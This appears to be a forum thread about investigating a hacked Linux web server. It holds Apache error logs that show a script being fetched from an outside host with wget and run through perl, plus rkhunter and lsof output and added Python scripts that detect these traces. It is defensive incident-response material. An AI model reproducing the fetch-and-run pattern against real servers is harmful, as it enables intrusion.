And this today:
Quote:
[Wed May 31 15:22:01 2006] [error] [client 68.142.250.76] File does not exist: /usr/share/psa-horde/robots.txt
--18:46:38-- [www.dougpoer.com]
=> `r.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 214
0K 100% 2.04 MB/s
18:46:39 (2.04 MB/s) - `r.txt' saved [214/214]
--18:46:39-- [www.dougpoer.com]
=> `geraw.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,427 [text/plain]
0K . 100% 13.61 MB/s
18:46:39 (13.61 MB/s) - `geraw.txt' saved [1,427/1,427]
--18:46:39-- [www.dougpoer.com]
=> `sc.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,859 [text/plain]
0K .. 100% 22.61 KB/s
18:46:40 (22.61 KB/s) - `sc.txt' saved [2,859/2,859]
--18:46:40-- [www.dougpoer.com]
=> `google.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,662 [text/plain]
0K . 100% 105.67 MB/s
18:46:40 (105.67 MB/s) - `google.txt' saved [1,662/1,662]
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abrecanal(canal)'
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abreprograma(programa)'
[Wed May 31 19:20:24 2006] [error] [client 65.120.133.3] File does not exist:
Quote:
[Fri Jun 02 01:06:42 2006] [error] [client 66.249.65.6] File does not exist: /usr/share/psa-horde/robots.txt
/: Unsupported scheme.
sh: line 1: CD: command not found
sh: line 1: WGET: command not found
--04:29:31-- [www.dougpoer.com]
=> `gg'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,519 [text/plain]
0K . 100% 14.49 MB/s
04:29:32 (14.49 MB/s) - `gg' saved [1,519/1,519]
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abrecanal(canal)'
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abreprograma(programa)'
[Fri Jun 02 06:45:44 2006] [error] [client 217.33.219.194] File does not e
$ uptime
19:28:06 up 12 days, 20:46, 2 users, load average: 213.96, 212.37, 208.44
/bin p+md5+u+g+s /sbin p+md5+u+g+s /usr/bin p+md5+u+g+s /usr/sbin p+md5+u+g+s
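The log excerpt above mixes Apache error_log entries with the stderr of child processes (a wget transcript, then `sh -c` failing on `perl google.txt ...`), which is the typical trace of a web application being abused to fetch and run a script. The following is an added example, not code from the thread: a small triage pass over such a log that tags each line with the indicator it matches and summarises what was downloaded and what was executed. The sample log lines, the host `files.example.invalid` and the indicator names are constructed for this example.

```python
import re

# Indicators of the "fetch a script, then run it" pattern seen when a web
# application is abused to execute shell commands.  These regexes are the
# example's own, not signatures from rkhunter or any other tool.
INDICATORS = [
    ("wget-fetch", re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(?P<url>\S+)"),
     "wget transcript: something on the server fetched a remote file"),
    ("wget-saved", re.compile(r"- `(?P<file>[^']+)' saved \[(?P<size>[\d,]+)/"),
     "wget wrote a file into the web server's working directory"),
    ("perl-exec", re.compile(r"sh: -c: line 1: `perl (?P<script>\S+)"),
     "perl was invoked on a downloaded file through sh -c"),
    ("sh-syntax", re.compile(r"sh: -c: line 1: syntax error"),
     "sh -c syntax error: a command string was built from untrusted input"),
    ("cmd-notfound", re.compile(r"sh: line 1: (?P<cmd>\S+): command not found"),
     "a command in a shell one-liner was not found (case-mangled CD/WGET)"),
]


def triage_error_log(lines):
    """Return one finding per matching line, in file order.
    Each finding carries the line number, the indicator name, the named
    groups the regex captured and a one-line explanation."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for name, rx, why in INDICATORS:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "indicator": name,
                                 "detail": m.groupdict(), "why": why})
                break  # first matching indicator wins for a given line
    return findings


def summarize(findings):
    """Count indicators and list the files written and the scripts executed."""
    counts = {}
    for f in findings:
        counts[f["indicator"]] = counts.get(f["indicator"], 0) + 1
    downloaded = sorted({f["detail"]["file"] for f in findings
                         if f["indicator"] == "wget-saved"})
    executed = sorted({f["detail"]["script"] for f in findings
                       if f["indicator"] == "perl-exec"})
    return {"counts": counts, "downloaded": downloaded, "executed": executed}


# Constructed sample modelled on an Apache error_log that also captures the
# stderr of CGI/PHP child processes; host, client address and paths are
# placeholders, not data from any real server.
SAMPLE_LOG = """\
[Wed May 31 15:22:01 2006] [error] [client 192.0.2.10] File does not exist: /var/www/html/robots.txt
--18:46:38-- http://files.example.invalid/r.txt
           => `r.txt'
18:46:39 (2.04 MB/s) - `r.txt' saved [214/214]
--18:46:39-- http://files.example.invalid/google.txt
           => `google.txt'
18:46:40 (105.67 MB/s) - `google.txt' saved [1,662/1,662]
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abrecanal(canal)'
sh: line 1: WGET: command not found
""".splitlines()

if __name__ == "__main__":
    found = triage_error_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']:>3}  {f['indicator']:<13} {f['why']}")
    print(summarize(found))
```

Run it against the real file with `triage_error_log(open("/var/log/httpd/error_log").read().splitlines())`; the interesting part is not the individual matches but the `downloaded` list, which tells you which names to look for in the web server's working directory and in /tmp.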
Quote from author:
root]# rkhunter -c
Rootkit Hunter 1.2.7 is running
Determining OS... Ready
Checking binaries
* Selftests
Strings (command) [ Skipped! ]
* System tools
Info: prelinked files found
Performing 'known good' check...
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/dmesg [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mount [ OK ]
/bin/netstat [ OK ]
/bin/ps [ OK ]
/bin/su [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/modinfo [ OK ]
/sbin/runlevel [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/users [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
[Press <ENTER> to continue]
Check rootkits
* Default files and directories
Rootkit '55808 Trojan - Variant A'... [ OK ]
ADM Worm... [ OK ]
Rootkit 'AjaKit'... [ OK ]
Rootkit 'aPa Kit'... [ OK ]
Rootkit 'Apache Worm'... [ OK ]
Rootkit 'Ambient (ark) Rootkit'... [ OK ]
Rootkit 'Balaur Rootkit'... [ OK ]
Rootkit 'BeastKit'... [ OK ]
Rootkit 'beX2'... [ OK ]
Rootkit 'BOBKit'... [ OK ]
Rootkit 'CiNIK Worm (Slapper.B variant)'... [ OK ]
Rootkit 'Danny-Boy's Abuse Kit'... [ OK ]
Rootkit 'Devil RootKit'... [ OK ]
Rootkit 'Dica'... [ OK ]
Rootkit 'Dreams Rootkit'... [ OK ]
Rootkit 'Duarawkz'... [ OK ]
Rootkit 'Flea Linux Rootkit'... [ OK ]
Rootkit 'FreeBSD Rootkit'... [ OK ]
Rootkit 'Fuck`it Rootkit'... [ OK ]
Rootkit 'GasKit'... [ OK ]
Rootkit 'Heroin LKM'... [ OK ]
Rootkit 'HjC Kit'... [ OK ]
Rootkit 'ignoKit'... [ OK ]
Rootkit 'ImperalsS-FBRK'... [ OK ]
Rootkit 'Irix Rootkit'... [ OK ]
Rootkit 'Kitko'... [ OK ]
Rootkit 'Knark'... [ OK ]
Rootkit 'Li0n Worm'... [ OK ]
Rootkit 'Lockit / LJK2'... [ OK ]
Rootkit 'MRK'... [ OK ]
Rootkit 'Ni0 Rootkit'... [ OK ]
Rootkit 'RootKit for SunOS / NSDAP'... [ OK ]
Rootkit 'Optic Kit (Tux)'... [ OK ]
Rootkit 'Oz Rootkit'... [ OK ]
Rootkit 'Portacelo'... [ OK ]
Rootkit 'R3dstorm Toolkit'... [ OK ]
Rootkit 'RH-Sharpe's rootkit'... [ OK ]
Rootkit 'RSHA's rootkit'... [ OK ]
Sebek LKM [ OK ]
Rootkit 'Scalper Worm'... [ OK ]
Rootkit 'Shutdown'... [ OK ]
Rootkit 'SHV4'... [ OK ]
Rootkit 'SHV5'... [ OK ]
Rootkit 'Sin Rootkit'... [ OK ]
Rootkit 'Slapper'... [ OK ]
Rootkit 'Sneakin Rootkit'... [ OK ]
Rootkit 'Suckit Rootkit'... [ OK ]
Rootkit 'SunOS Rootkit'... [ OK ]
Rootkit 'Superkit'... [ OK ]
Rootkit 'TBD (Telnet BackDoor)'... [ OK ]
Rootkit 'TeLeKiT'... [ OK ]
Rootkit 'T0rn Rootkit'... [ OK ]
Rootkit 'Trojanit Kit'... [ OK ]
Rootkit 'Tuxtendo'... [ OK ]
Rootkit 'URK'... [ OK ]
Rootkit 'VcKit'... [ OK ]
Rootkit 'Volc Rootkit'... [ OK ]
Rootkit 'X-Org SunOS Rootkit'... [ OK ]
Rootkit 'zaRwT.KiT Rootkit'... [ OK ]
* Suspicious files and malware
Scanning for known rootkit strings [ Skipped ]
/usr/local/bin/rkhunter: line 1: strings: command not found
Scanning for known rootkit files [ OK ]
Testing running processes... [ OK ]
Miscellaneous Login backdoors [ OK ]
Miscellaneous directories [ OK ]
Software related files [ OK ]
Sniffer logs [ OK ]
[Press <ENTER> to continue]
* Trojan specific characteristics
shv4
Checking /etc/rc.d/rc.sysinit
Test 1 [ Clean ]
Test 2 [ Clean ]
Test 3 [ Clean ]
Checking /etc/inetd.conf [ Not found ]
Checking /etc/xinetd.conf [ Clean ]
* Suspicious file properties
chmod properties
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
Script replacements
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
* OS dependant tests
Linux
Checking loaded kernel modules... [ OK ]
Checking files attributes [ OK ]
Checking LKM module path [ OK ]
Networking
* Check: frequently used backdoors
Port 2001: Scalper Rootkit [ OK ]
Port 2006: CB Rootkit [ OK ]
Port 2128: MRK [ OK ]
Port 14856: Optic Kit (Tux) [ OK ]
Port 47107: T0rn Rootkit [ OK ]
Port 60922: zaRwT.KiT [ OK ]
* Interfaces
Scanning for promiscuous interfaces [ OK ]
[Press <ENTER> to continue]
System checks
* Allround tests
Checking hostname... Found. Hostname is d096.nexlink.net
Checking for passwordless user accounts... OK
Checking for differences in user accounts... OK. No changes.
Checking for differences in user groups... OK. No changes.
Checking boot.local/rc.local file...
- /etc/rc.local [ OK ]
- /etc/rc.d/rc.local [ OK ]
- /usr/local/etc/rc.local [ Not found ]
- /usr/local/etc/rc.d/rc.local [ Not found ]
- /etc/conf.d/local.start [ Not found ]
- /etc/init.d/boot.local [ Not found ]
Checking rc.d files...
Processing........................................
Result rc.d files check [ OK ]
Checking history files
Bourne Shell [ OK ]
* Filesystem checks
Checking /dev for suspicious files... [ OK ]
Scanning for hidden files... [ OK ]
[Press <ENTER> to continue]
Application advisories
* Application scan
Checking Apache2 modules ... [ Not found ]
Checking Apache configuration ... [ OK ]
* Application version scan
- GnuPG 1.2.4 [ OK ]
- Apache 2.0.51 [ Old or patched version ]
- Bind DNS 9.2.3 [ Unknown ]
- OpenSSL 0.9.7a [ Old or patched version ]
- PHP 4.3.10 [ Old or patched version ]
- Procmail MTA 3.22 [ OK ]
- ProFTPd 1.2.10 [ OK ]
- OpenSSH 3.6.1p2 [ Old or patched version ]
Your system contains some unknown version numbers. Please run Rootkit Hunter
with the --update parameter or fill in the contact form (www.rootkit.nl)
Security advisories
* Check: Groups and Accounts
Searching for /etc/passwd... [ Found ]
Checking users with UID '0' (root)... [ OK ]
* Check: SSH
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
* Check: Events and Logging
Search for syslog configuration... [ OK ]
Checking for running syslog slave... [ OK ]
Checking for logging to remote system... [ OK (no remote logging) ]
[Press <ENTER> to continue]
---------------------------- Scan results ----------------------------
MD5
MD5 compared: 49
Incorrect MD5 checksums: 0
File scan
Scanned files: 342
Possible infected files: 0
Application scan
Vulnerable applications: 4
Scanning took 39 seconds
-----------------------------------------------------------------------
Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (www.rootkit.nl)
-----------------------------------------------------------------------
and the result of top -c:
Quote from author:
root]# lsof -ni
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
httpsd 1399 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
portmap 2415 rpc 3u IPv4 2547 UDP *:sunrpc
portmap 2415 rpc 4u IPv4 2550 TCP *:sunrpc (LISTEN)
rpc.statd 2434 rpcuser 4u IPv4 2580 UDP *:32768
rpc.statd 2434 rpcuser 5u IPv4 2570 UDP *:914
rpc.statd 2434 rpcuser 6u IPv4 2583 TCP *:32768 (LISTEN)
snmpd 2586 root 8u IPv4 2836 TCP *:smux (LISTEN)
snmpd 2586 root 9u IPv4 2837 UDP *:snmp
cupsd 2597 root 0u IPv4 2919 TCP 127.0.0.1:ipp (LISTEN)
cupsd 2597 root 2u IPv4 2920 UDP *:ipp
named 2729 named 20u IPv4 3015 UDP 127.0.0.1:domain
named 2729 named 21u IPv4 3016 TCP 127.0.0.1:domain (LISTEN)
named 2729 named 22u IPv4 3033 UDP @ip_de_mon_serveur:domain
named 2729 named 23u IPv4 3034 TCP @ip_de_mon_serveur:domain (LISTEN)
named 2729 named 24u IPv4 3035 UDP *:32769
named 2729 named 25u IPv6 3036 UDP *:32770
named 2729 named 26u IPv4 3037 TCP 127.0.0.1:rndc (LISTEN)
sshd 2784 root 3u IPv6 3029 TCP *:ssh (LISTEN)
xinetd 2797 root 5u IPv4 3155 TCP *:ftp (LISTEN)
xinetd 2797 root 6u IPv4 3156 TCP *:poppassd (LISTEN)
xinetd 2797 root 8u IPv4 3157 TCP 127.0.0.1:32769 (LISTEN)
xinetd 2797 root 9u IPv4 3160 TCP *:smtp (LISTEN)
xinetd 2797 root 10u IPv4 3161 TCP *:smtps (LISTEN)
mysqld 2839 mysql 3u IPv4 3095 TCP *:mysql (LISTEN)
postmaste 2886 postgres 4u IPv4 3146 UDP 127.0.0.1:32771->127.0.0.1:32771
postmaste 2887 postgres 4u IPv4 3146 UDP 127.0.0.1:32771->127.0.0.1:32771
couriertc 2915 root 5u IPv4 3498 TCP *:imap (LISTEN)
couriertc 2927 root 5u IPv4 3519 TCP *:imaps (LISTEN)
couriertc 2937 root 5u IPv4 3540 TCP *:pop3 (LISTEN)
couriertc 2948 root 5u IPv4 3561 TCP *:pop3s (LISTEN)
spamd 2992 root 5u IPv4 3708 TCP 127.0.0.1:783 (LISTEN)
httpd 3075 root 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3075 root 4u IPv6 3967 TCP *:https (LISTEN)
httpd 3145 root 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3145 root 4u IPv6 3967 TCP *:https (LISTEN)
httpd 3150 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3150 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 3152 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3152 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpsd 3192 root 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3196 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3197 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3198 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3199 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3200 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3252 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
drwebd 3256 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3257 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3258 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3259 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3260 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3261 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3262 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3263 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3264 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3265 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3266 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3267 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3268 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3269 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3270 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3271 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3272 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
miniserv. 3395 root 5u IPv4 5764 TCP *:10000 (LISTEN)
miniserv. 3395 root 6u IPv4 5765 UDP *:10000
sshd 5014 root 4u IPv6 694532 TCP @ip_de_mon_serveur:ssh->213.154.92.24:2691 (ESTABLISHED)
qmail-rem 5213 qmailr 3u IPv4 767653 TCP @ip_de_mon_serveur:38151->4.79.181.14:smtp (ESTABLISHED)
httpd 8473 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 8473 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 9768 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 9768 apache 4u IPv6 3967 TCP *:https (LISTEN)
qmail-rem 14120 qmailr 3u IPv4 778672 TCP @ip_de_mon_serveur:38198->67.28.113.73:smtp (ESTABLISHED)
qmail-rem 15313 qmailr 3u IPv4 726533 TCP @ip_de_mon_serveur:38020->67.28.113.10:smtp (ESTABLISHED)
qmail-rem 15421 qmailr 3u IPv4 726770 TCP @ip_de_mon_serveur:38029->67.28.113.10:smtp (ESTABLISHED)
qmail-rem 15475 qmailr 3u IPv4 726450 TCP @ip_de_mon_serveur:38013->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 15516 qmailr 3u IPv4 726043 TCP @ip_de_mon_serveur:37990->4.79.181.135:smtp (ESTABLISHED)
qmail-rem 15542 qmailr 3u IPv4 726638 TCP @ip_de_mon_serveur:38024->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 15670 qmailr 3u IPv4 726712 TCP @ip_de_mon_serveur:38027->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 15899 qmailr 3u IPv4 727526 TCP @ip_de_mon_serveur:38065->4.79.181.13:smtp (ESTABLISHED)
httpd 17117 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17117 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17131 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17131 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17132 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17132 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17137 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17137 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17159 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17159 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17161 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17161 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17169 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17169 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17170 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17170 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17173 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17173 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17176 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17176 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17183 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17183 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17184 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17184 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17200 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17200 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17201 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17201 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17211 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17211 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17217 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17217 apache 4u IPv6 3967 TCP *:https (LISTEN)
qmail-rem 24739 qmailr 3u IPv4 745843 TCP @ip_de_mon_serveur:38119->67.28.113.19:smtp (ESTABLISHED)
qmail-rem 24790 qmailr 3u IPv4 736048 TCP @ip_de_mon_serveur:38116->67.28.113.70:smtp (ESTABLISHED)
qmail-rem 29931 qmailr 3u IPv4 816016 TCP @ip_de_mon_serveur:38281->67.28.113.70:smtp (ESTABLISHED)
qmail-smt 30136 qmaild 0u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-smt 30136 qmaild 1u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-smt 30136 qmaild 2u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-rem 30137 qmailr 3u IPv4 816834 TCP @ip_de_mon_serveur:38323->4.79.181.13:smtp (ESTABLISHED)
qmail-que 30141 drweb 2u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-rem 30489 qmailr 3u IPv4 818163 TCP @ip_de_mon_serveur:38410->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 30554 qmailr 3u IPv4 818903 TCP @ip_de_mon_serveur:38453->67.28.113.19:smtp (ESTABLISHED)
qmail-rem 30821 qmailr 3u IPv4 819562 TCP @ip_de_mon_serveur:38497->4.79.181.13:smtp (ESTABLISHED)
qmail-smt 30907 qmaild 0u IPv4 819911 TCP @ip_de_mon_serveur:smtp->212.23.126.23:32277 (ESTABLISHED)
qmail-smt 30907 qmaild 1u IPv4 819911 TCP @ip_de_mon_serveur:smtp->212.23.126.23:32277 (ESTABLISHED)
qmail-smt 30907 qmaild 2u IPv4 819911 TCP @ip_de_mon_serveur:smtp->212.23.126.23:32277 (ESTABLISHED)
qmail-rem 30913 qmailr 3u IPv4 820372 TCP @ip_de_mon_serveur:38540->67.28.113.19:smtp (SYN_SENT)
qmail-rem 30954 qmailr 3u IPv4 820099 TCP @ip_de_mon_serveur:38527->67.28.113.70:smtp (ESTABLISHED)
qmail-smt 31026 qmaild 0u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
qmail-smt 31026 qmaild 1u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
qmail-smt 31026 qmaild 2u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
qmail-que 31031 drweb 2u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
tcp-env 31077 root 0u IPv4 820612 TCP @ip_de_mon_serveur:smtp->218.5.74.84:3626 (ESTABLISHED)
tcp-env 31077 root 1u IPv4 820612 TCP @ip_de_mon_serveur:smtp->218.5.74.84:3626 (ESTABLISHED)
tcp-env 31077 root 2u IPv4 820612 TCP @ip_de_mon_serveur:smtp->218.5.74.84:3626 (ESTABLISHED)
tcp-env 31077 root 3u IPv4 820622 TCP @ip_de_mon_serveur:38550->218.5.74.84:auth (SYN_SENT)
qmail-rem 31092 qmailr 3u IPv4 820679 TCP @ip_de_mon_serveur:38554->4.79.181.13:smtp (SYN_SENT)
tcp-env 31093 root 0u IPv4 820681 TCP @ip_de_mon_serveur:smtp->220.72.119.33:2000 (ESTABLISHED)
tcp-env 31093 root 1u IPv4 820681 TCP @ip_de_mon_serveur:smtp->220.72.119.33:2000 (ESTABLISHED)
tcp-env 31093 root 2u IPv4 820681 TCP @ip_de_mon_serveur:smtp->220.72.119.33:2000 (ESTABLISHED)
tcp-env 31093 root 3u IPv4 820685 TCP @ip_de_mon_serveur:38555->220.72.119.33:auth (SYN_SENT)
qmail-rem 31101 qmailr 3u IPv4 820721 TCP @ip_de_mon_serveur:38558->67.28.113.70:smtp (ESTABLISHED)
qmail-smt 31102 qmaild 0u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
qmail-smt 31102 qmaild 1u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
qmail-smt 31102 qmaild 2u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
tcp-env 31106 root 0u IPv4 820734 TCP @ip_de_mon_serveur:smtp->61.145.121.80:44028 (ESTABLISHED)
tcp-env 31106 root 1u IPv4 820734 TCP @ip_de_mon_serveur:smtp->61.145.121.80:44028 (ESTABLISHED)
tcp-env 31106 root 2u IPv4 820734 TCP @ip_de_mon_serveur:smtp->61.145.121.80:44028 (ESTABLISHED)
tcp-env 31106 root 3u IPv4 820740 TCP @ip_de_mon_serveur:38559->61.145.121.80:auth (SYN_SENT)
spamd 31116 popuser 11u IPv4 820778 UDP *:59156
qmail-que 31121 drweb 2u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
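Reading a `lsof -ni` dump this long by eye is error-prone. The block below is an added example (not code from the thread) that parses that output format and answers the two questions a responder asks first: which root-owned services are reachable from every interface, and how many connections are inbound to our services versus opened by this host towards remote ones. The sample listing is constructed in the same column layout as the one above; `203.0.113.5` stands in for the server's own address and `198.51.100.x` for remote hosts.

```python
from collections import Counter

# Constructed sample in the column layout of `lsof -ni` (COMMAND PID USER FD
# TYPE DEVICE SIZE NODE NAME).  Addresses are documentation ranges, not real.
SAMPLE_LSOF = """\
COMMAND    PID   USER   FD   TYPE DEVICE SIZE NODE NAME
sshd      2784   root    3u  IPv6   3029       TCP *:ssh (LISTEN)
xinetd    2797   root    5u  IPv4   3155       TCP *:ftp (LISTEN)
xinetd    2797   root    8u  IPv4   3157       TCP 127.0.0.1:32769 (LISTEN)
xinetd    2797   root    9u  IPv4   3160       TCP *:smtp (LISTEN)
snmpd     2586   root    9u  IPv4   2837       UDP *:snmp
mysqld    2839  mysql    3u  IPv4   3095       TCP *:mysql (LISTEN)
miniserv. 3395   root    5u  IPv4   5764       TCP *:10000 (LISTEN)
httpd     3150 apache    3u  IPv6   3965       TCP *:http (LISTEN)
qmail-rem 5213 qmailr    3u  IPv4 767653       TCP 203.0.113.5:38151->198.51.100.14:smtp (ESTABLISHED)
qmail-rem 14120 qmailr   3u  IPv4 778672       TCP 203.0.113.5:38198->198.51.100.73:smtp (ESTABLISHED)
qmail-rem 30913 qmailr   3u  IPv4 820372       TCP 203.0.113.5:38540->198.51.100.19:smtp (SYN_SENT)
tcp-env  31077   root    0u  IPv4 820612       TCP 203.0.113.5:smtp->198.51.100.84:3626 (ESTABLISHED)
"""


def parse_lsof(text):
    """Turn `lsof -ni` text into dicts.  lsof leaves SIZE blank for sockets,
    so the fields are taken from both ends of the line, not by column index."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header line
        parts = line.split()
        if len(parts) < 8:
            continue
        if parts[-1].startswith("("):           # TCP state such as (LISTEN)
            state, proto, name = parts[-1].strip("()"), parts[-3], parts[-2]
        else:                                   # UDP sockets carry no state
            state, proto, name = None, parts[-2], parts[-1]
        local, _, remote = name.partition("->")
        rows.append({"cmd": parts[0], "pid": int(parts[1]), "user": parts[2],
                     "proto": proto, "local": local, "remote": remote or None,
                     "state": state})
    return rows


def port_of(addr):
    """'203.0.113.5:38151' -> '38151'; '*:ssh' -> 'ssh' (lsof resolves names
    unless run with -P, so ports may be names or numbers)."""
    return addr.rsplit(":", 1)[1]


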